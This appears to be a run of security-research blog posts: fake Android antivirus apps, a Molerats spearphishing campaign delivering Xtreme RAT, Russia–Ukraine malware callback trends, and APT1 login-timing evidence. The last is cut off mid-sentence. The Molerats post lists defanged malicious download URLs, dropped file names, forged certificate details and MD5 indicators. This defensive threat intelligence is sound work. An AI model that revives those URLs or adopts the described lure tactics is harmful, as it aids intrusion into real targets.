    [caption id="attachment_5575" align="aligncenter" width="307"]The toast message of the Anti-Hacker screen. Fig. 3. The toast message of the Anti-Hacker screen.[/caption]

    The same trick is used when software is being updated which does nothing. When the Update button is clicked, a progress bar appears with text “Updating the Database...”. Later it’s changed to “ Database updated Successfully”.

    2. Anti-Hacker PLUS (com.minaadib.antihackerplus) Price $3.99

    Fig. 4 and 5 show the paid version of the application com.minaadib.antihacker. The source code of the application is almost the same as the free version, meaning the application doesn’t perform scanning either. When the user presses the Scan button, the application displays the progress bar for some time and then shows the same notification stating the device is “clean.”

    [caption id="attachment_5577" align="aligncenter" width="549"]The Anti-Hacker Plus app in Google Play Fig. 4. The Anti-Hacker Plus app in Google Play[/caption]

    [caption id="attachment_5600" align="aligncenter" width="552"]Anti-Hacker Plus app in Fig. 5. Anti-Hacker Plus app in[/caption]

    The paid version does add one “feature,” however. It offers the ability to kill running apps and tasks, which, in reality, is just a line of code that waits one second after being activated before popping up a toast notification saying it has killed all tasks. You can see this lack of useful functionality in the code below:


    3.JU AntiVirus Pro (com.minaadib.juantiviruspro) Price $2.99

    This application claims to be an antivirus application that detects malware, however, it actually follow the same patterns as the two scam apps above. It simply shows a progress bar for period of time as though it is doing something and then displays “Device is clean.” The source code of the “scan” button is similar to the applications above.

    [caption id="attachment_5580" align="alignnone" width="599"]Fig. 5. JU Anit-Virus Pro in Google Play store. Fig. 6. JU Anit-Virus Pro in Google Play store.[/caption]

    The image and the source code below show that the Scan button is a fake.

    [caption id="attachment_5581" align="aligncenter" width="429"]Fig. 6. The Scan button in JU Anti-Virus Pro app. Fig. 7. The Scan button in JU Anti-Virus Pro app.[/caption]


    4. Me Web Secure  (com.minaadib.mewebsecurefree) Free

    This application is a slightly different security tool, offering configuration settings for things like browsing and cookies. Just as the apps above, these are no more than superficial layouts on empty code. Cleverly, the developer disabled some of the options in the free version so users feel compelled to pay to enable them.

    [caption id="attachment_5584" align="aligncenter" width="586"]Me Web Secure app in Google Play store. Fig. 8. Me Web Secure app in Google Play store.[/caption]

    [caption id="attachment_5585" align="aligncenter" width="401"]Fig. 8. Me Web Secure app UI. Fig. 9. Me Web Secure app UI.[/caption]

    5. Me Web Secure Pro (com.minaadib.mewebsecure) Price $1.99

    Similar to its free version counterpart – com.minaadib.mewebsecurefree – this application shows security and network configuration screens that are simply UI layouts. As stated above, the disabled options in the free version are enabled in the paid version of the application, but no fake source code was even written to fake the existence of those features being implemented.

    [caption id="attachment_5589" align="aligncenter" width="600"]The Me Web Secure Pro app in Google Play Store. Fig. 10. The Me Web Secure Pro app in Google Play Store.[/caption]

    In the image below, the app shows it’s performing configurations when the “ON” button is pressed.

    [caption id="attachment_5590" align="aligncenter" width="401"]Scan button in the Me Web Secure Pro app. Fig. 11. Scan button in the Me Web Secure Pro app.[/caption]

    The image below is the code path when the ON button is clicked. It is a progress bar of 5 seconds only for visual purposes. No configuration is performed by the application.





    Molerats, Here for Spring!

    Between 29 April and 27 May, FireEye Labs identified several new Molerats attacks targeting at least one major U.S. financial institution and multiple, European government organizations.

    When we last published details relevant to Molerats activity in August of 2013, we covered a large campaign of Poison Ivy (PIVY) attacks directed against several targets in the Middle East and the United States. We felt it was significant to highlight the previous PIVY campaigns to:

    1. Demonstrate that any large-scale, targeted attacks utilizing this off-the-shelf Remote Access Tool (RAT) shouldn’t be automatically linked to Chinese threat actors.
    2. Share several documented tactics, techniques, and procedures (TTP), and indicators of compromise (IOC) for identifying Molerats activity.

    However, this was just one unique facet to a much broader series of related attacks dating back to as early as October 2011 and are still ongoing. Previous research has linked these campaigns to Molerats, but with so much public attention focused on APT threat actors based in China, it’s easy to lose track of targeted attacks carried out by other threat actor groups based elsewhere. For example, we recently published the "Operation Saffron Rose" whitepaper, detailing a rapidly evolving Iranian-based threat actor group known as the “Ajax Security Team."

    New Attacks, Same Old Tactics

    With the reuse of command and control (CnC) infrastructure and a similar set of TTPs, molerats1Molerats activity has been tracked and expanded to a growing target list, which includes:

    • Palestinian and Israeli surveillance targets
    • Government departments in Israel, Turkey, Slovenia, Macedonia, New Zealand, Latvia, the U.S., and the UK
    • The Office of the Quartet Representative
    • The British Broadcasting Corporation (BBC)
    • A major U.S. financial institution
    • Multiple European government organizations

    Previous Molerats campaigns have used several garden-variety, freely available backdoors such as CyberGate and Bifrost, but, most recently, we have observed them making use of the PIVY and Xtreme RATs. Previous campaigns made use of at least one of three observed forged Microsoft certificates, allowing security researchers to accurately tie together separate attacks even if the attacks used different backdoors. There also appears to be a habitual use of lures or decoy documents – in either English or Arabic-language – with content focusing on active conflicts in the Middle East. The lures come packaged  with malicious files that drop the Molerats’ flavor of the week, which happen to all be Xtreme RAT binaries in these most recent campaigns.

    Groundhog Day

    On 27 May we observed at least one victim downloading a malicious .ZIP file as the result of clicking on a shortened Google URL – http://goo[.]gl[/]AMD3yX – likely contained inside of a targeted spearphishing email. However, we were unable to confirm for this particular victim:


    1) “حصري بالصور لحظة الإعتداء على المشير عبد الفتاح السيسي.scr” 
(MD5: a6a839438d35f503dfebc6c5eec4330e)

    • Malicious download URL was sent to a well-known European government organization.
    • The shortened URL breaks out to “http://lovegame[.]us/ Photos[.]zip,” which was clicked/downloaded by the victim.
    • The extracted binary, “حصري بالصور لحظة الإعتداء على المشير عبد الفتاح السيسي.scr,” opens up a decoy Word document and installs/executes the Xtreme RAT binary into a temp directory, “Documents and Settings\admin\Local Settings\Temp\Chrome.exe.”
    • The decoy document, “rotab.doc,” contains three images (a political cartoon and two edited photos), all negatively depicting former military chief Abdel Fattah el-Sisi.
    • Xtreme RAT binary dropped: “Chrome.exe” (MD5: a90225a88ee974453b93ee7f0d93b104), which is unsigned.
    • As of 29 May, the URL has been clicked 225 times by a variety of platforms and browser types, so the campaign was likely not limited to just one victim.
    • Two of the download referrers are webmail providers (” and “”) further indicating the malicious URL was likely disseminated via spearphishing emails.

    On 29 April we observed two unique malicious attachments being sent to two different victims via spearphishing emails:

    2) 8ca915ab1d69a7007237eb83ae37eae5moleratssss

    • Malicious file sent to both the financial institution and Ministry of Foreign Affairs targets.
    • Drops an Arabic language decoy document titled “Sisi.doc”, which appears to contain several copy/pasted excerpts of (now retired) Egyptian Major General Hossam Sweilem, discussing military strategy and the Muslim Brotherhood.
    • The title of the document appears to have several Chinese characters, yet the entire body of the document is written in Arabic. As noted in our August 2013 blog post, this could possibly be a poor attempt to frame China-based threat actors for these attacks.
    • Xtreme RAT binary dropped: “sky.exe” (MD5: 2d843b8452b5e48acbbe869e51337993), which is unsigned.


    3) “Too soon to embrace Sisi _ Egypt is an unpredictable place.scr" (MD5: 7f9c06cd950239841378f74bbacbef60)

    • Malicious file only sent to a European government organization.
    • Drops an English language decoy document also titled “Sisi.doc”, however this one appears to be an exact copy of a 23 April Financial Times’ news article about the uncertainties surrounding former military chief Abdel Fattah el-Sisi running for president in the upcoming Egyptian elections.
    • Drops the same Xtreme RAT binary: “sky.exe” (MD5: 2d843b8452b5e48acbbe869e51337993), which is unsigned.

    Another attribute regularly exhibited by Molerats malware samples are that they are often archived inside of self-extracting RAR files and encoded with EXECryptor V2.2, along with several other legitimate looking archived files.

    Related Samples

    Both of the malicious files above have a compile date/time of 2014-04-17 09:43:29-0000, and, based on this information, we were able to identify five additional samples (one sample only contained a lure but no malicious binary), related to the 29 April attacks. These samples were a little more interesting, because they contained an array of either attempted forged or self-signed Authenticode certificates.

    All of the additionally identified samples were sent to one of the same European government organizations mentioned previously.

    4) 2b0f8a8d8249402be0d83aedd9073662molerats5

    • Drops an Arabic language Word Document titled “list.doc”.
    • The title of the document appears to have several Chinese characters, yet the entire body of the document is written in Arabic.
    • Xtreme RAT binary dropped: “Download.exe” (MD5: cff48ff88c81795ee8cebdc3306605d0). This malware is signed with a self-signed certificate issued by “FireZilla” (see below).Certificate serial number: {75 dd 9b 14 c6 6e 20 0b 2e 22 95 3a 62 7b 39 19}.


    Forged FireZilla certificate

    5) 4f170683ae19b5eabcc54a578f2b530bmolerats8

    • Drops an Arabic language Word Document titled “points.doc,” which appears to be an online clipping from a news article about ongoing Palestinian reconciliation meetings between Fatah and Hamas in the Gaza strip.
    • The title of the document appears to have several Chinese characters, yet the entire body of the document is written in Arabic.
    • Xtreme RAT binary dropped: “VBB.exe” (MD5: 6f9585c8748cd0e7103eab4eda233666). Though the malware appeared to be signed with a certificate named “Kaspersky Lab”, the real hash did not match the signed hash (see below).Certificate serial number: {a7 ed a5 a2 15 c0 d1 91 32 9a 1c a4 b0 53 eb 18}.


    (Forged Kaspersky Lab certificate)

    6) 793b7340b7c713e79518776f5710e9dd & a75281ee9c7c365a776ce8d2b11d28daredtext

    • Both drop an Arabic language Word Document titled “qatar.doc,” which appears to be an online clipping for a new article concerning members of the Gulf Cooperation Council (GCC) and the ongoing conflicts between Saudi Arabia, the United Arab Emirates (UAE), and Bahrain – all against Qatar because of the country’s support for the Muslim Brotherhood.
    • The title of the document appears to have several Chinese characters, yet the entire body of the document is written in Arabic.
    • Xtreme RAT binary dropped by the first sample: “AVG.exe” (MD5: a51da465920589253bf32c6115072909), which is unsigned.

    7) Pivoting off one of the fake Authenticode certificates we were able to identify at least one additional related binary, “vmware.exe” (MD5: 6be46a719b962792fd8f453914a87d3e), also Xtreme RAT, but doesn’t appear to have been sent to any of our customers. The malicious binary is also encoded with EXECryptor V2.2–similar to the samples above–and the CnC domain has resolved to IPs that overlap with previously identified Molerats malware.

    Indicators of Compromise


    Although the samples above are all Xtreme RAT, all but two samples communicate over different TCP ports. The port 443 callback listed in the last sample is also not using actual SSL, but instead, the sample transmits communications in clear-text – a common tactic employed by adversaries to try and bypass firewall/proxy rules applying to communications over traditional web ports. These tactics, among several others mentioned previously, seem to indicate that Molerats are not only aware of security researchers’ efforts in trying to track them but are also attempting to avoid using any obvious, repeating patterns that could be used to more easily track endpoints infected with their malware.


    Although a large number of attacks against our customers appear to originate from China, we are tracking lesser-known actors also targeting the same firms. Molerats campaigns seem to be limited to only using freely available malware; however, their growing list of targets and increasingly evolving techniques in subsequent campaigns are certainly noteworthy.

    MD5 Samples 

    • a6a839438d35f503dfebc6c5eec4330e
    • 7f9c06cd950239841378f74bbacbef60
    • 8ca915ab1d69a7007237eb83ae37eae5
    • 2b0f8a8d8249402be0d83aedd9073662
    • 4f170683ae19b5eabcc54a578f2b530b
    • 793b7340b7c713e79518776f5710e9dd
    • a75281ee9c7c365a776ce8d2b11d28da
    • 6be46a719b962792fd8f453914a87d3e

    Older Molerats samples from Dec 2013 (not listed above)

    • 34c5e6b2a988076035e47d1f74319e86
    • 13e351c327579fee7c2b975b17ef377c
    • c0488b48d6aabe828a76ae427bd36cf1
    • 14d83f01ecf644dc29302b95542c9d35

     References & Credits

    A special thanks to Ned Moran and Matt Briggs of FireEye Labs for supporting this research.


    Strategic Analysis: As Russia-Ukraine Conflict Continues, Malware Activity Rises

    Cyber conflicts are a reflection of traditional, “real life” human conflicts. And the more serious the conflict in the “real world,” the more conspicuous its cyber shadow is likely to be. So let’s look at a serious, current international conflict – the one between Russia and Ukraine – to see if we can find its reflection in cyberspace.

    One of the most reliable ways to discover computer network operations is to look for malware “callbacks” – the communications initiated from compromised computers to an attacker’s first-stage command-and-control (C2) server. At FireEye, we detect and analyze millions of such callbacks every year.

    Table 1, below, shows the top 20 countries to receive first-stage malware callbacks over the last 16 months, according to the latest FireEye data.


    Table 1 – Callback Infrastructure: the Last 16 Months

    As we track the evolution of callbacks during this period, we see a likely correlation between the overall number of callbacks both to Russia and to Ukraine, and the intensification of the crisis between the two nations. The two key indicators we see are:

    • In 2013, Russia was, on average, #7 on this list; in 2014, its average rank is #5.
    • In 2013, Ukraine was, on average, #12 on this list; in 2014, its average rank is #9.

    The biggest single monthly jump occurred in March 2014, when Russia moved from #7 to #3. In that same month, the following events also took place in Russia and Ukraine:

    • Russia’s parliament authorized the use of military force in Ukraine;
    • Vladimir Putin signed a bill incorporating the Crimean peninsula into the Russian Federation;
    • The U.S. and EU imposed travel bans and asset freezes on some senior Russian officials;
    • Russian military forces massed along the Ukrainian border; and
    • Russian energy giant Gazprom threatened to cut off Ukraine’s supply of gas.

    The graphs below provide a closer look at the crucial month of March 2014, specifically comparing it to malware callback data from February.

    Figure 1 shows a significant rise in malware callbacks to Russia from three of the top four source countries in February: Canada, South Korea, and the U.S. (Great Britain had a slight decline).


    Figure 1 – Callbacks to Russia in Feb/Mar 2014: Top Four Countries

    Figure 2 depicts the same, general rise in callbacks to Russia from many other countries around the world.


    Figure 2 – Callbacks to Russia in Feb/Mar 2014: Rest of World

    Figure 3 shows that the sharp rise in callbacks to Russia in March 2014 was seen in every FireEye industry vertical.


    Figure 3 – Callbacks to Russia in Feb/Mar 2014: Industry Verticals

    Tables 2 and 3, below, compare the rise in callbacks to Russia and Ukraine against the rise in callbacks to other countries for February and March 2014. It is  important to note that nearly half of the world’s countries experienced a decrease in callbacks during this same time frame.

    Table 2 shows the countries that received the highest increase, from February to March 2014, in the number of source countries sending callbacks to them. Ukraine and Russia both placed in the top ten countries worldwide, with Ukraine jumping from 29 source countries to 39, and Russia moving from 45 to 53.


    Table 2 – Callbacks in 2014: Number of Source Countries

    Table 3 shows the increase in the number of malware signatures associated with the callbacks to each country for February and March 2014. Ukraine does not appear in the top ten (it tied for #15), but Russia was #4 on this list (again, nearly half of the world’s countries showed no increase or a decrease).


    Table 3 – Callbacks in 2014: Number of Malware Signatures

    It is not my intention here to suggest that Russia and/or Ukraine are the sole threat actors within this data set. I also do not want to speculate too much on the precise motives of the attackers behind all of these callbacks. Within such a large volume of malware activity, there are likely to be lone hackers, “patriotic hackers,” cyber criminals, Russian and Ukrainian government operations, and cyber operations initiated by other nations.

    What I want to convey in this blog is that generic, high-level traffic analysis – for which it is not always necessary to know the exact content or the original source of individual communications – might be used to draw a link between large-scale malware activity and important geopolitical events. In other words, the rise in callbacks to Russia and Ukraine (or to any other country or region of the world) during high levels of geopolitical tension suggests strongly that computer network operations are being used as one way to gain competitive advantage in the conflict.

    In the near future, we will apply this methodology to other global occurrences to further identify patterns that could provide valuable advanced threat protection insights.

    The PLA and the 8:00am-5:00pm Work Day: FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity

    Yesterday, the U.S. Department of Justice (DOJ) announced the indictment of five members of the Second Bureau of the People’s Liberation Army (PLA) General Staff Department’s Third Department, also known as PLA Unit 61398.  This is the same unit that Mandiant publicly unmasked last year in the APT1 report. At the time it was originally released, China denounced the report, saying that it lacked sufficient evidence. Following the DOJ’s indictment, however, China’s usual response changed from “you lack sufficient evidence” to “you have fabricated the evidence”, calling on the U.S. to “correct the error immediately.” This is a significant evolution in China’s messaging; if the evidence is real, it overwhelmingly demonstrates China's unilateral attempts to leapfrog years of industrial development -- by using cyber intrusions to access and steal intellectual property.

    The evidence provided in the indictment includes Exhibit F (pages 54-56), which shows three charts based on Dynamic DNS data. These charts indicate that the named defendants (Unit 61398 members) were re-pointing their domain names at a Dynamic DNS provider during Chinese business hours from 2008 to 2013. The China work day, particularly for government offices, is very predictable, as noted on this travel site:

    "Government offices, institutions and schools begin at 8:00 or 8:30, and end at 17:00 or 17:30 with two-hour noon break, from Monday to Friday. They usually close on Saturday, Sunday and public holidays."

    What Exhibit F shows is a spike of activity on Monday through Friday around 8am in Shanghai (China Standard Time), a roughly 2-hour lull at lunchtime, and then another spike of activity from about 2pm to 6pm. The charts also show that there were very few changes in Dynamic DNS resolution on weekends.

    At Mandiant (now a FireEye company), we can corroborate the DOJ’s data by releasing additional evidence that we did not include in the APT1 report. In the APT1 report, we specified the following:

    • Over a two-year period (January 2011 to January 2013) we confirmed 1,905 instances of APT1 actors logging into their hop infrastructure from 832 different IP addresses with Remote Desktop.

    • Of the 832 IP addresses, 817 (98.2%) were Chinese and belong predominantly to four large net blocks in Shanghai which we will refer to as APT1’s home networks.

    • In order to make a user’s experience as seamless as possible, the Remote Desktop protocol requires client applications to forward several important details to the server, including their client hostname and the client keyboard layout. In 1,849 of the 1,905 (97%) APT1 Remote Desktop sessions we observed in the past two years, the keyboard layout setting was “Chinese (Simplified) — US Keyboard.”

    One thing we did not originally provide was an analysis of the time of day and day of week that these 1,905 Remote Desktop (RDP) connections occurred. However, when we look at these connections in bar chart format, obvious patterns appear:

    rdp-analysis-fig1Figure 1: APT1 Remote Desktop login times distributed by hour of day (China Standard Time)


    rdp-analysis-fig2Figure 2: APT1 Remote Desktop login times distributed by day of week (China Standard Time)

    Essentially, APT1 conducted almost all of the 1,905 RDP connections from 2011 to 2013:

    • (1) On week days (Monday through Friday),
    • (2) between 8am and noon, 2pm and 6pm, and 7pm and 10pm CST.

    On some occasions, APT1 personnel appear to have worked on weekends, but these are minor exceptions to the norm. Consider the following evidence together for the 1,905 RDP connections:

    • 98.2% of IP addresses used to log in to hop points (which help mask the real point of origin to victim organizations) were from Shanghai networks
    • 97% of the connections were from computers using the Simplified Chinese language setting
    • 97.5% of the connections occurred on weekdays, China Standard Time
    • 98.8% of the connections occurred between 7am and midnight China Standard Time
      • 75% occurred between 8am to noon or between 2pm to 6pm
      • 15% occurred between 7pm and 10pm

    The simplest conclusion based on these facts is that APT1 is operating in China, and most likely in Shanghai. Although one could attempt to explain every piece of evidence away, at some point the evidence starts to become overwhelming when it is all pointing in one direction. Our timestamp data, derived from active RDP logins over a two year period, matches the DOJ’s timestamp data, derived from a differ